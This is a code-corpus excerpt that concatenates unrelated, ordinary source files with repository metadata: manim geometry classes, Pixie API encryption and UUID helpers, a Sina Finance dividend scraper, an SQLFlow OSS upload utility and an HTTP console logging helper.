        ... tip_shape=MyCustomArrowTip)
        >>> isinstance(arr.tip, RegularPolygon)
        True
        >>> from manim import Scene
        >>> class CustomTipExample(Scene):
        ...     def construct(self):
        ...         self.play(Create(arr))
    Using a class inherited from :class:`ArrowTip` to get a non-filled
    tip is a shorthand to manually specifying the arrow tip style as follows::
        >>> arrow = Arrow(np.array([0, 0, 0]), np.array([1, 1, 0]),
        ... tip_style={'fill_opacity': 0, 'stroke_width': 3})
    The following example illustrates the usage of all of the predefined
    arrow tips.
    .. manim:: ArrowTipsShowcase
        :save_last_frame:
        from manim.mobject.geometry import ArrowTriangleTip, ArrowSquareTip, ArrowSquareFilledTip,\
                                            ArrowCircleTip, ArrowCircleFilledTip
        class ArrowTipsShowcase(Scene):
            def construct(self):
                a00 = Arrow(start=[-2, 3, 0], end=[2, 3, 0], color=YELLOW)
                a11 = Arrow(start=[-2, 2, 0], end=[2, 2, 0], tip_shape=ArrowTriangleTip)
                a12 = Arrow(start=[-2, 1, 0], end=[2, 1, 0])
                a21 = Arrow(start=[-2, 0, 0], end=[2, 0, 0], tip_shape=ArrowSquareTip)
                a22 = Arrow([-2, -1, 0], [2, -1, 0], tip_shape=ArrowSquareFilledTip)
                a31 = Arrow([-2, -2, 0], [2, -2, 0], tip_shape=ArrowCircleTip)
                a32 = Arrow([-2, -3, 0], [2, -3, 0], tip_shape=ArrowCircleFilledTip)
                b11 = a11.copy().scale(0.5, scale_tips=True).next_to(a11, RIGHT)
                b12 = a12.copy().scale(0.5, scale_tips=True).next_to(a12, RIGHT)
                b21 = a21.copy().scale(0.5, scale_tips=True).next_to(a21, RIGHT)
                self.add(a00, a11, a12, a21, a22, a31, a32, b11, b12, b21)
    """
    def __init__(self, *args, **kwargs):
        # Abstract base: concrete tips must provide their own initializer
        # (see the predefined subclasses listed in the docstring).
        raise NotImplementedError("Has to be implemented in inheriting subclasses.")
    @property
    def base(self):
        r"""The base point of the arrow tip.
        This is the point connecting to the arrow line.
        Examples
        --------
        ::
            >>> arrow = Arrow(np.array([0, 0, 0]), np.array([2, 0, 0]), buff=0)
            >>> arrow.tip.base.round(2) + 0. # add 0. to avoid negative 0 in output
            array([1.65, 0. , 0. ])
        """
        # Halfway along the tip's outline; for the symmetric predefined tips
        # this is the point opposite the tip point.
        return self.point_from_proportion(0.5)
    @property
    def tip_point(self):
        r"""The tip point of the arrow tip.
        Examples
        --------
        ::
            >>> arrow = Arrow(np.array([0, 0, 0]), np.array([2, 0, 0]), buff=0)
            >>> arrow.tip.tip_point.round(2) + 0.
            array([2., 0., 0.])
        """
        # The first point of the path is used as the tip itself.
        return self.get_points()[0]
    @property
    def vector(self):
        r"""The vector pointing from the base point to the tip point.
        Examples
        --------
        ::
            >>> arrow = Arrow(np.array([0, 0, 0]), np.array([2, 2, 0]), buff=0)
            >>> arrow.tip.vector.round(2) + 0.
            array([0.25, 0.25, 0. ])
        """
        return self.tip_point - self.base
    @property
    def tip_angle(self):
        r"""The angle of the arrow tip.
        Examples
        --------
        ::
            >>> arrow = Arrow(np.array([0, 0, 0]), np.array([1, 1, 0]), buff=0)
            >>> round(arrow.tip.tip_angle, 5) == round(PI/4, 5)
            True
        """
        # Orientation of the base->tip vector in the plane.
        return angle_of_vector(self.vector)
    @property
    def length(self):
        r"""The length of the arrow tip.
        Examples
        --------
        ::
            >>> arrow = Arrow(np.array([0, 0, 0]), np.array([1, 2, 0]))
            >>> round(arrow.tip.length, 3)
            0.35
        """
        # Euclidean norm of the base->tip vector.
        return np.linalg.norm(self.vector)
class ArrowTriangleTip(ArrowTip, Triangle):
    r"""Triangular arrow tip drawn as an outline."""

    def __init__(
        self,
        fill_opacity=0,
        stroke_width=3,
        length=DEFAULT_ARROW_TIP_LENGTH,
        start_angle=PI,
        **kwargs,
    ):
        # ArrowTip itself is abstract, so initialise the Triangle part directly.
        Triangle.__init__(
            self,
            fill_opacity=fill_opacity,
            stroke_width=stroke_width,
            start_angle=start_angle,
            **kwargs,
        )
        # Scale the tip so both dimensions match the requested length.
        self.width = length
        self.stretch_to_fit_height(length)
class ArrowTriangleFilledTip(ArrowTriangleTip):
    r"""Triangular arrow tip with a filled interior.

    This is the default arrow tip shape.
    """

    def __init__(self, fill_opacity=1, stroke_width=0, **kwargs):
        # Same shape as the outline version, but filled and strokeless.
        super().__init__(fill_opacity=fill_opacity, stroke_width=stroke_width, **kwargs)
class ArrowCircleTip(ArrowTip, Circle):
    r"""Circular arrow tip drawn as an outline."""

    def __init__(
        self,
        fill_opacity=0,
        stroke_width=3,
        length=DEFAULT_ARROW_TIP_LENGTH,
        start_angle=PI,
        **kwargs,
    ):
        # Keep the start angle as an attribute rather than forwarding it to
        # Circle's constructor.
        self.start_angle = start_angle
        Circle.__init__(
            self,
            fill_opacity=fill_opacity,
            stroke_width=stroke_width,
            **kwargs,
        )
        # Scale the tip so both dimensions match the requested length.
        self.width = length
        self.stretch_to_fit_height(length)
class ArrowCircleFilledTip(ArrowCircleTip):
    r"""Circular arrow tip with a filled interior."""

    def __init__(self, fill_opacity=1, stroke_width=0, **kwargs):
        # Same shape as the outline version, but filled and strokeless.
        super().__init__(fill_opacity=fill_opacity, stroke_width=stroke_width, **kwargs)
class ArrowSquareTip(ArrowTip, Square):
    r"""Square arrow tip drawn as an outline."""

    def __init__(
        self,
        fill_opacity=0,
        stroke_width=3,
        length=DEFAULT_ARROW_TIP_LENGTH,
        start_angle=PI,
        **kwargs,
    ):
        # Keep the start angle as an attribute rather than forwarding it to
        # Square's constructor.
        self.start_angle = start_angle
        Square.__init__(
            self,
            fill_opacity=fill_opacity,
            stroke_width=stroke_width,
            side_length=length,
            **kwargs,
        )
        # Normalise width/height the same way the other tip classes do.
        self.width = length
        self.stretch_to_fit_height(length)
class ArrowSquareFilledTip(ArrowSquareTip):
    r"""Square arrow tip with a filled interior."""

    def __init__(self, fill_opacity=1, stroke_width=0, **kwargs):
        # Same shape as the outline version, but filled and strokeless.
        super().__init__(fill_opacity=fill_opacity, stroke_width=stroke_width, **kwargs)
class Cutout(VMobject, metaclass=ConvertToOpenGL):
    """A shape with smaller shapes cut out of it.

    .. warning::
        Technically, this class behaves similar to a symmetric difference: if
        parts of the ``mobjects`` are not located within the ``main_shape``,
        these parts will be added to the resulting :class:`~.VMobject`.

    Parameters
    ----------
    main_shape : :class:`~.VMobject`
        The primary shape from which cutouts are made.
    mobjects : :class:`~.VMobject`
        The smaller shapes which are to be cut out of the ``main_shape``.
    kwargs
        Further keyword arguments that are passed to the constructor of
        :class:`~.VMobject`.

    Examples
    --------
    .. manim:: CutoutExample

        class CutoutExample(Scene):
            def construct(self):
                s1 = Square().scale(2.5)
                s2 = Triangle().shift(DOWN + RIGHT).scale(0.5)
                s3 = Square().shift(UP + RIGHT).scale(0.5)
                s4 = RegularPolygon(5).shift(DOWN + LEFT).scale(0.5)
                s5 = RegularPolygon(6).shift(UP + LEFT).scale(0.5)
                c = Cutout(s1, s2, s3, s4, s5, fill_opacity=1, color=BLUE, stroke_color=RED)
                self.play(Write(c), run_time=4)
                self.wait()
    """

    def __init__(self, main_shape, *mobjects, **kwargs):
        super().__init__(**kwargs)
        self.append_points(main_shape.get_points())
        # Cut-outs must wind opposite to the outer shape so that the fill
        # rule treats them as holes.
        sub_direction = "CCW" if main_shape.get_direction() == "CW" else "CW"
        for mobject in mobjects:
            self.append_points(mobject.force_direction(sub_direction).get_points())
class Angle(VMobject, metaclass=ConvertToOpenGL):
    """A circular arc or elbow-type mobject representing an angle of two lines.
    Parameters
    ----------
    line1 :
        The first line.
    line2 :
        The second line.
    radius :
        The radius of the :class:`Arc`.
    quadrant : Sequence[:class:`int`]
        A sequence of two :class:`int` numbers determining which of the 4 quadrants should be used.
        The first value indicates whether to anchor the arc on the first line closer to the end point (1)
        or start point (-1), and the second value functions similarly for the
        end (1) or start (-1) of the second line.
        Possibilities: (1,1), (-1,1), (1,-1), (-1,-1).
    other_angle :
        Toggles between the two possible angles defined by two points and an arc center. If set to
        False (default), the arc will always go counterclockwise from the point on line1 until
        the point on line2 is reached. If set to True, the angle will go clockwise from line1 to line2.
    dot : :class:`bool`
        Allows for a :class:`Dot` in the arc. Mainly used as an convention to indicate a right angle.
        The dot can be customized in the next three parameters.
    dot_radius : :class:`float`
        The radius of the :class:`Dot`. If not specified otherwise, this radius will be 1/10 of the arc radius.
    dot_distance : :class:`float`
        Relative distance from the center to the arc: 0 puts the dot in the center and 1 on the arc itself.
    dot_color : :class:`~.Colors`
        The color of the :class:`Dot`.
    elbow : :class:`bool`
        Produces an elbow-type mobject indicating a right angle, see :class:`RightAngle` for more information
        and a shorthand.
    **kwargs
        Further keyword arguments that are passed to the constructor of :class:`Arc` or :class:`Elbow`.
    Examples
    --------
    The first example shows some right angles with a dot in the middle while the second example shows
    all 8 possible angles defined by two lines.
    .. manim:: RightArcAngleExample
        :save_last_frame:
        class RightArcAngleExample(Scene):
            def construct(self):
                line1 = Line( LEFT, RIGHT )
                line2 = Line( DOWN, UP )
                rightarcangles = [
                    Angle(line1, line2, dot=True),
                    Angle(line1, line2, radius=0.4, quadrant=(1,-1), dot=True, other_angle=True),
                    Angle(line1, line2, radius=0.5, quadrant=(-1,1), stroke_width=8, dot=True, dot_color=YELLOW, dot_radius=0.04, other_angle=True),
                    Angle(line1, line2, radius=0.7, quadrant=(-1,-1), color=RED, dot=True, dot_color=GREEN, dot_radius=0.08),
                ]
                plots = VGroup()
                for angle in rightarcangles:
                    plot=VGroup(line1.copy(),line2.copy(), angle)
                    plots.add(plot)
                plots.arrange(buff=1.5)
                self.add(plots)
    .. manim:: AngleExample
        :save_last_frame:
        class AngleExample(Scene):
            def construct(self):
                line1 = Line( LEFT + (1/3) * UP, RIGHT + (1/3) * DOWN )
                line2 = Line( DOWN + (1/3) * RIGHT, UP + (1/3) * LEFT )
                angles = [
                    Angle(line1, line2),
                    Angle(line1, line2, radius=0.4, quadrant=(1,-1), other_angle=True),
                    Angle(line1, line2, radius=0.5, quadrant=(-1,1), stroke_width=8, other_angle=True),
                    Angle(line1, line2, radius=0.7, quadrant=(-1,-1), color=RED),
                    Angle(line1, line2, other_angle=True),
                    Angle(line1, line2, radius=0.4, quadrant=(1,-1)),
                    Angle(line1, line2, radius=0.5, quadrant=(-1,1), stroke_width=8),
                    Angle(line1, line2, radius=0.7, quadrant=(-1,-1), color=RED, other_angle=True),
                ]
                plots = VGroup()
                for angle in angles:
                    plot=VGroup(line1.copy(),line2.copy(), angle)
                    plots.add(VGroup(plot,SurroundingRectangle(plot, buff=0.3)))
                plots.arrange_in_grid(rows=2,buff=1)
                self.add(plots)
    .. manim:: FilledAngle
        :save_last_frame:
        class FilledAngle(Scene):
            def construct(self):
                l1 = Line(ORIGIN, 2 * UP + RIGHT).set_color(GREEN)
                l2 = (
                    Line(ORIGIN, 2 * UP + RIGHT)
                    .set_color(GREEN)
                    .rotate(-20 * DEGREES, about_point=ORIGIN)
                )
                norm = l1.get_length()
                a1 = Angle(l1, l2, other_angle=True, radius=norm - 0.5).set_color(GREEN)
                a2 = Angle(l1, l2, other_angle=True, radius=norm).set_color(GREEN)
                q1 = a1.get_points() # save all coordinates of points of angle a1
                q2 = a2.reverse_direction().get_points() # save all coordinates of points of angle a1 (in reversed direction)
                pnts = np.concatenate([q1, q2, q1[0].reshape(1, 3)]) # adds points and ensures that path starts and ends at same point
                mfill = VMobject().set_color(ORANGE)
                mfill.set_points_as_corners(pnts).set_fill(GREEN, opacity=1)
                self.add(l1, l2)
                self.add(mfill)
    """

    def __init__(
        self,
        line1: Line,
        line2: Line,
        radius: Optional[float] = None,
        quadrant=(1, 1),
        other_angle: bool = False,
        dot=False,
        dot_radius=None,
        dot_distance=0.55,
        dot_color=WHITE,
        elbow=False,
        **kwargs,
    ):
        super().__init__(**kwargs)
        self.quadrant = quadrant
        self.dot_distance = dot_distance
        self.elbow = elbow
        # Center of the angle: the (possibly extrapolated) intersection of
        # the two lines.
        inter = line_intersection(
            [line1.get_start(), line1.get_end()], [line2.get_start(), line2.get_end()]
        )
        if radius is None:
            # Pick an automatic radius: use the distance from the intersection
            # to the anchored end of each line (per quadrant), and shrink the
            # default 0.4 radius when either line is too short for it.
            if quadrant[0] == 1:
                dist_1 = np.linalg.norm(line1.get_end() - inter)
            else:
                dist_1 = np.linalg.norm(line1.get_start() - inter)
            if quadrant[1] == 1:
                dist_2 = np.linalg.norm(line2.get_end() - inter)
            else:
                dist_2 = np.linalg.norm(line2.get_start() - inter)
            if np.minimum(dist_1, dist_2) < 0.6:
                radius = (2 / 3) * np.minimum(dist_1, dist_2)
            else:
                radius = 0.4
        # BUG FIX: previously ``self.radius`` was only assigned when the caller
        # passed an explicit radius, leaving the attribute unset on the
        # auto-computed path. Always record the radius actually used.
        self.radius = radius
        # Points where the arc (or elbow) meets each line.
        anchor_angle_1 = inter + quadrant[0] * radius * line1.get_unit_vector()
        anchor_angle_2 = inter + quadrant[1] * radius * line2.get_unit_vector()
        if elbow:
            # Elbow: two straight segments through the "corner" point that is
            # offset along both lines at once.
            anchor_middle = (
                inter
                + quadrant[0] * radius * line1.get_unit_vector()
                + quadrant[1] * radius * line2.get_unit_vector()
            )
            angle_mobject = Elbow(**kwargs)
            angle_mobject.set_points_as_corners(
                [anchor_angle_1, anchor_middle, anchor_angle_2]
            )
        else:
            angle_1 = angle_of_vector(anchor_angle_1 - inter)
            angle_2 = angle_of_vector(anchor_angle_2 - inter)
            if not other_angle:
                # Counterclockwise sweep from line1 to line2.
                start_angle = angle_1
                if angle_2 > angle_1:
                    angle_fin = angle_2 - angle_1
                else:
                    angle_fin = 2 * np.pi - (angle_1 - angle_2)
            else:
                # Clockwise sweep (negative angle) from line1 to line2.
                start_angle = angle_1
                if angle_2 < angle_1:
                    angle_fin = -angle_1 + angle_2
                else:
                    angle_fin = -2 * np.pi + (angle_2 - angle_1)
            angle_mobject = Arc(
                radius=radius,
                angle=angle_fin,
                start_angle=start_angle,
                arc_center=inter,
                **kwargs,
            )
        if dot:
            if dot_radius is None:
                dot_radius = radius / 10
            # BUG FIX: as with ``radius`` above, ``self.dot_radius`` used to be
            # assigned only when the caller provided an explicit value.
            self.dot_radius = dot_radius
            right_dot = Dot(ORIGIN, radius=dot_radius, color=dot_color)
            # Place the dot on the bisecting ray of the arc, at the requested
            # relative distance from the intersection.
            dot_anchor = (
                inter
                + (angle_mobject.get_center() - inter)
                / np.linalg.norm(angle_mobject.get_center() - inter)
                * radius
                * dot_distance
            )
            right_dot.move_to(dot_anchor)
            self.add(right_dot)
        self.set_points(angle_mobject.get_points())
class RightAngle(Angle):
    """An elbow-type mobject representing a right angle between two lines.

    Parameters
    ----------
    line1 : :class:`Line`
        The first line.
    line2 : :class:`Line`
        The second line.
    length : :class:`float`
        The length of the arms.
    **kwargs
        Further keyword arguments that are passed to the constructor of :class:`Angle`.

    Examples
    --------
    .. manim:: RightAngleExample
        :save_last_frame:

        class RightAngleExample(Scene):
            def construct(self):
                line1 = Line( LEFT, RIGHT )
                line2 = Line( DOWN, UP )
                rightangles = [
                    RightAngle(line1, line2),
                    RightAngle(line1, line2, length=0.4, quadrant=(1,-1)),
                    RightAngle(line1, line2, length=0.5, quadrant=(-1,1), stroke_width=8),
                    RightAngle(line1, line2, length=0.7, quadrant=(-1,-1), color=RED),
                ]
                plots = VGroup()
                for rightangle in rightangles:
                    plot=VGroup(line1.copy(),line2.copy(), rightangle)
                    plots.add(plot)
                plots.arrange(buff=1.5)
                self.add(plots)
    """

    def __init__(self, line1, line2, length=None, **kwargs):
        # A right angle is an Angle forced into elbow mode; ``length``
        # plays the role of the Angle's radius.
        super().__init__(line1, line2, radius=length, elbow=True, **kwargs)
| 32.707865
| 148
| 0.565997
|
4a07b3da1e3175e195466aa9e2b4a84af426d6e7
| 2,094
|
py
|
Python
|
src/api/python/pxapi/utils.py
|
hangqiu/pixie
|
1dd4af47d40ff856c4d52a1d6de81f78a76ff31e
|
[
"Apache-2.0"
] | 1,821
|
2020-04-08T00:45:27.000Z
|
2021-09-01T14:56:25.000Z
|
src/api/python/pxapi/utils.py
|
hangqiu/pixie
|
1dd4af47d40ff856c4d52a1d6de81f78a76ff31e
|
[
"Apache-2.0"
] | 142
|
2020-04-09T06:23:46.000Z
|
2021-08-24T06:02:12.000Z
|
src/api/python/pxapi/utils.py
|
hangqiu/pixie
|
1dd4af47d40ff856c4d52a1d6de81f78a76ff31e
|
[
"Apache-2.0"
] | 105
|
2021-09-08T10:26:50.000Z
|
2022-03-29T09:13:36.000Z
|
# Copyright 2018- The Pixie Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
import uuid
from authlib.jose import JsonWebKey, RSAKey, JsonWebEncryption
from src.api.proto.uuidpb import uuid_pb2 as uuidpb
from src.api.proto.vizierpb import vizierapi_pb2 as vpb
def uuid_pb_from_string(id_str: str) -> uuidpb.UUID:
    """Parse a canonical UUID string into its protobuf representation.

    The 128-bit value is split into the two 64-bit halves expected by the
    ``uuidpb.UUID`` message.
    """
    value = uuid.UUID(id_str).int
    mask_64 = (1 << 64) - 1
    return uuidpb.UUID(high_bits=value >> 64, low_bits=value & mask_64)
def uuid_pb_to_string(pb: uuidpb.UUID) -> str:
    """Render a protobuf UUID (two 64-bit halves) as a canonical string."""
    combined = (pb.high_bits << 64) + pb.low_bits
    return str(uuid.UUID(int=combined))
class CryptoOptions:
    """Holds a freshly generated RSA key pair plus the JWE algorithm choices
    used for encrypting script results (see :meth:`encrypt_options`)."""
    def __init__(self):
        # Generate a new 4096-bit RSA key pair per options object; only the
        # public half is ever embedded in requests, the private half stays here.
        rsa = RSAKey.generate_key(key_size=4096, is_private=True)
        self.jwk_public_key = JsonWebKey.import_key(rsa.as_pem(is_private=False))
        self.jwk_private_key = JsonWebKey.import_key(rsa.as_pem(is_private=True))
        # JWE algorithm identifiers: RSA-OAEP-256 key wrapping, AES-256-GCM
        # content encryption, DEFLATE ("DEF") compression.
        self._key_alg = 'RSA-OAEP-256'
        self._content_alg = 'A256GCM'
        self._compression_alg = 'DEF'
    def encrypt_options(self) -> vpb.ExecuteScriptRequest.EncryptionOptions:
        # Build the request-side options message carrying the public key only.
        return vpb.ExecuteScriptRequest.EncryptionOptions(
            jwk_key=self.jwk_public_key.as_json(),
            key_alg=self._key_alg,
            content_alg=self._content_alg,
            compression_alg=self._compression_alg,
        )
def decode_row_batch(crypt: CryptoOptions, data) -> vpb.RowBatchData:
    """Decrypt a JWE compact-serialized payload and parse it as RowBatchData.

    ``crypt`` must be the CryptoOptions whose public key encrypted ``data``.
    """
    decrypted = JsonWebEncryption().deserialize_compact(data, crypt.jwk_private_key)
    row_batch = vpb.RowBatchData()
    row_batch.ParseFromString(decrypted['payload'])
    return row_batch
| 32.71875
| 81
| 0.708691
|
4a07b46b70027acb016053375d1c103fc1cf1a20
| 2,537
|
py
|
Python
|
stock/tushare_ShareBonus.py
|
vyouzhis/energy
|
c9c9b0c7dc2e85a093fb531f80c3aa6f458e8b6e
|
[
"Apache-2.0"
] | null | null | null |
stock/tushare_ShareBonus.py
|
vyouzhis/energy
|
c9c9b0c7dc2e85a093fb531f80c3aa6f458e8b6e
|
[
"Apache-2.0"
] | null | null | null |
stock/tushare_ShareBonus.py
|
vyouzhis/energy
|
c9c9b0c7dc2e85a093fb531f80c3aa6f458e8b6e
|
[
"Apache-2.0"
] | 1
|
2019-07-19T03:03:43.000Z
|
2019-07-19T03:03:43.000Z
|
#!/usr/bin/python2
# -*- coding: utf-8 -*-
# mongo_data
#
# use mongodb pyalgotrade and sz50
#
# vim:fileencoding=utf-8:sw=4:et -*- coding: utf-8 -*-
import json
import sys
import pandas as pd
import lxml.html
from lxml import etree
from pandas.compat import StringIO
import _index
from energy.db.emongo import emongo
from energy.db.dblist import dblist
try:
from urllib.request import urlopen, Request
except ImportError:
from urllib2 import urlopen, Request
def _get_ShareBonus_data(code):
    """Fetch the dividend/bonus history table for a Shanghai/Shenzhen listed
    company from Sina Finance.

    Parameters
    ----------
    code : string
        Stock code.

    Returns
    -------
    DataFrame with the columns:
        date      -- announcement date
        bonus     -- bonus shares (per 10 shares)
        tran      -- shares converted from capital reserve (per 10 shares)
        divid     -- pre-tax cash dividend in yuan (per 10 shares)
        progress  -- implementation status
        gxdate    -- ex-rights/ex-dividend date
        regdate   -- record date
    Returns None (after printing the error) when the page cannot be
    fetched or parsed.
    """
    url = "http://money.finance.sina.com.cn/corp/go.php/vISSUE_ShareBonus/stockid/%s.phtml"%(code)
    try:
        # The page is GBK-encoded; empty cells are rendered as "--".
        text = urlopen(Request(url), timeout=10).read()
        text = text.decode('GBK').replace('--', '')
        html = lxml.html.parse(StringIO(text))
        nodes = html.xpath("//table[@id='sharebonus_1']")
        table_html = ''.join([etree.tostring(node) for node in nodes])
        df = pd.read_html(table_html)[0]
        df.columns = ['date', 'bonus', 'tran', 'divid', 'progress',
                      'gxdate', 'regdate', 'i', 'j', 'k', 'u']
        # Drop the placeholder columns we have no use for.
        for unused in ('u', 'i', 'j', 'k'):
            df.pop(unused)
        return df
    except Exception as e:
        print(e)
def getAllShareBonus():
    """Rebuild the MongoDB ``ShareBonus`` collection for every known stock.

    Wipes the collection, then stores one document per stock of the form
    ``{code: [row, ...]}`` with the rows from :func:`_get_ShareBonus_data`.
    """
    dbl = dblist()
    all_codes = dbl.getAllCodeList()
    dbl.Close()
    emg = emongo()
    conn = emg.getCollectionNames("ShareBonus")
    # Start from a clean collection before re-inserting everything.
    conn.remove()
    for post in all_codes:
        code = post["code"]
        df = _get_ShareBonus_data(code)
        records = json.loads(df.to_json(orient="records"))
        conn.insert({str(code): records})
    emg.Close()
def main():
    # Entry point. NOTE(review): this module uses Python 2 ``print``
    # statements and will not run under Python 3 without modification.
    if len(sys.argv) == 2:
        # Single-stock mode: fetch and store the dividend table for the one
        # code given on the command line.
        stock = sys.argv[1]
        print "get one stock:",stock
        emg = emongo()
        conn = emg.getCollectionNames("ShareBonus")
        df = _get_ShareBonus_data(stock)
        cjson = df.to_json(orient="records")
        j = json.loads(cjson)
        dt = {}
        dt[str(stock)] = j
        conn.insert(dt)
        emg.Close()
    else:
        # No argument: refresh the collection for every known stock code.
        print "get all stock"
        getAllShareBonus()
if __name__ == "__main__":
    main()
| 22.855856
| 99
| 0.558928
|
4a07b5f44c91cfdddf1e5d87905a7ef961658a62
| 3,290
|
py
|
Python
|
python/sqlflow_submitter/pai/utils.py
|
MATRIX4284/sqlflow
|
eba7efd0d23c26c9c7f93526faddeba24ea3274f
|
[
"Apache-2.0"
] | 1
|
2019-12-24T01:38:17.000Z
|
2019-12-24T01:38:17.000Z
|
python/sqlflow_submitter/pai/utils.py
|
MATRIX4284/sqlflow
|
eba7efd0d23c26c9c7f93526faddeba24ea3274f
|
[
"Apache-2.0"
] | null | null | null |
python/sqlflow_submitter/pai/utils.py
|
MATRIX4284/sqlflow
|
eba7efd0d23c26c9c7f93526faddeba24ea3274f
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 The SQLFlow Authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import oss2
import os
import uuid
from contextlib import contextmanager
# Maps each public OSS endpoint to the corresponding "-internal" endpoint,
# intended for access from within the same Aliyun region (see linked doc).
oss_internal_endpoints = {
    # From https://help.aliyun.com/document_detail/31837.html?spm=a2c4g.11186623.2.20.3eba7f5eufj1Pt#concept-zt4-cvy-5db
    "oss-ap-northeast-1.aliyuncs.com": "oss-ap-northeast-1-internal.aliyuncs.com",
    "oss-ap-south-1.aliyuncs.com": "oss-ap-south-1-internal.aliyuncs.com",
    "oss-ap-southeast-1.aliyuncs.com": "oss-ap-southeast-1-internal.aliyuncs.com",
    "oss-ap-southeast-2.aliyuncs.com": "oss-ap-southeast-2-internal.aliyuncs.com",
    "oss-ap-southeast-3.aliyuncs.com": "oss-ap-southeast-3-internal.aliyuncs.com",
    "oss-ap-southeast-5.aliyuncs.com": "oss-ap-southeast-5-internal.aliyuncs.com",
    "oss-cn-beijing.aliyuncs.com": "oss-cn-beijing-internal.aliyuncs.com",
    "oss-cn-chengdu.aliyuncs.com": "oss-cn-chengdu-internal.aliyuncs.com",
    "oss-cn-hangzhou.aliyuncs.com": "oss-cn-hangzhou-internal.aliyuncs.com",
    "oss-cn-hongkong.aliyuncs.com": "oss-cn-hongkong-internal.aliyuncs.com",
    "oss-cn-huhehaote.aliyuncs.com": "oss-cn-huhehaote-internal.aliyuncs.com",
    "oss-cn-qingdao.aliyuncs.com": "oss-cn-qingdao-internal.aliyuncs.com",
    "oss-cn-shanghai.aliyuncs.com": "oss-cn-shanghai-internal.aliyuncs.com",
    "oss-cn-shenzhen.aliyuncs.com": "oss-cn-shenzhen-internal.aliyuncs.com",
    "oss-cn-zhangjiakou.aliyuncs.com": "oss-cn-zhangjiakou-internal.aliyuncs.com",
    "oss-eu-central-1.aliyuncs.com": "oss-eu-central-1-internal.aliyuncs.com",
    "oss-eu-west-1.aliyuncs.com": "oss-eu-west-1-internal.aliyuncs.com",
    "oss-me-east-1.aliyuncs.com": "oss-me-east-1-internal.aliyuncs.com",
    "oss-us-east-1.aliyuncs.com": "oss-us-east-1-internal.aliyuncs.com",
    "oss-us-west-1.aliyuncs.com": "oss-us-west-1-internal.aliyuncs.com",
}
@contextmanager
def oss_temporary(ak, sk, endpoint, filename):
    '''
    oss_temporary copies `filename` to a temporary object on OSS and deletes it a.s.a.p.

    Parameters: `ak`/`sk` are the Aliyun access key id and secret, `endpoint`
    is a public OSS endpoint (it must be a key of `oss_internal_endpoints`),
    and `filename` is the local file to upload.

    Yields the oss:// URL of the uploaded object, addressed through the
    region's internal endpoint; the object is deleted when the context exits,
    even if the body raises.

    Example:
        with oss_temporary(YOUR_AK, YOUR_SK, ENDPOINT, 'test.py') as f:
            do_something_with(f)
    '''
    bucket_name = 'sqlflow-pai-submitter'
    auth = oss2.Auth(ak, sk)
    bucket = oss2.Bucket(auth, endpoint, bucket_name)
    bucket.create_bucket(oss2.BUCKET_ACL_PRIVATE, oss2.models.BucketCreateConfig(oss2.BUCKET_STORAGE_CLASS_IA))
    name = uuid.uuid4().hex
    if bucket.object_exists(name):
        raise FileExistsError("[Errno 17] File exists: '%s'" % name)  # This would never happen.
    bucket.put_object_from_file(name, filename)
    try:
        # BUG FIX: the original referenced the undefined name
        # `internal_endpoints` (a NameError); the module-level table is
        # `oss_internal_endpoints`.
        yield f'oss://{bucket_name}.{oss_internal_endpoints[endpoint]}/{name}'
    finally:
        # Delete the temporary object even if the with-body raised.
        bucket.delete_object(name)
| 51.40625
| 123
| 0.712462
|
4a07b7478e174cdc3445431af833137e81ea847f
| 958
|
py
|
Python
|
fHandleConnectionToServerTerminated.py
|
SkyLined/HTTP
|
f4e895508494dc007acd3ad011465a174e12ad88
|
[
"CC-BY-4.0"
] | 2
|
2020-06-25T03:51:05.000Z
|
2021-01-30T07:27:08.000Z
|
fHandleConnectionToServerTerminated.py
|
SkyLined/HTTP
|
f4e895508494dc007acd3ad011465a174e12ad88
|
[
"CC-BY-4.0"
] | null | null | null |
fHandleConnectionToServerTerminated.py
|
SkyLined/HTTP
|
f4e895508494dc007acd3ad011465a174e12ad88
|
[
"CC-BY-4.0"
] | null | null | null |
from mConsole import oConsole;
from mColorsAndChars import *;
from mCP437 import fsCP437FromBytesString;
from mNotProvided import *;
def fHandleConnectionToServerTerminated(oClient, oConnection, sbHostnameOrIPAddress):
  # Report on the console that the connection to the given server was
  # terminated, mentioning the resolved IP address only when the user
  # provided a hostname rather than an IP address.
  sHostnameOrIPAddress = fsCP437FromBytesString(sbHostnameOrIPAddress);
  (sRemoteIPAddress, uRemotePortNumber) = oConnection.txRemoteAddress[:2];
  # IPv6 addresses contain ":" and get bracketed to disambiguate the port.
  sHost = ("[%s]" % sHostnameOrIPAddress) if ":" in sHostnameOrIPAddress else sHostnameOrIPAddress;
  asIPAddressOutput = [
    COLOR_NORMAL, " using IP address ",
    COLOR_INFO, sRemoteIPAddress,
  ] if sHostnameOrIPAddress.lower() != sRemoteIPAddress.lower() else [];
  oConsole.fOutput(
    COLOR_ACTIVE, "C",
    COLOR_DISCONNECT, "-×→",
    COLOR_ACTIVE, "S",
    COLOR_NORMAL, " Connection to server ",
    COLOR_INFO, sHost,
    COLOR_NORMAL, ":",
    COLOR_INFO, str(uRemotePortNumber),
    asIPAddressOutput,
    COLOR_NORMAL, " terminated.",
  );
| 36.846154
| 89
| 0.723382
|
4a07b773ec3db9836ede919159be18ee26791d32
| 7,209
|
py
|
Python
|
Cryptography/3.Password Cracking/passDriver.py
|
swethapraba/SeniorYearCSElectives
|
67b989ffecd5cf7508258783b0ec26468cdf94fc
|
[
"CNRI-Python"
] | null | null | null |
Cryptography/3.Password Cracking/passDriver.py
|
swethapraba/SeniorYearCSElectives
|
67b989ffecd5cf7508258783b0ec26468cdf94fc
|
[
"CNRI-Python"
] | null | null | null |
Cryptography/3.Password Cracking/passDriver.py
|
swethapraba/SeniorYearCSElectives
|
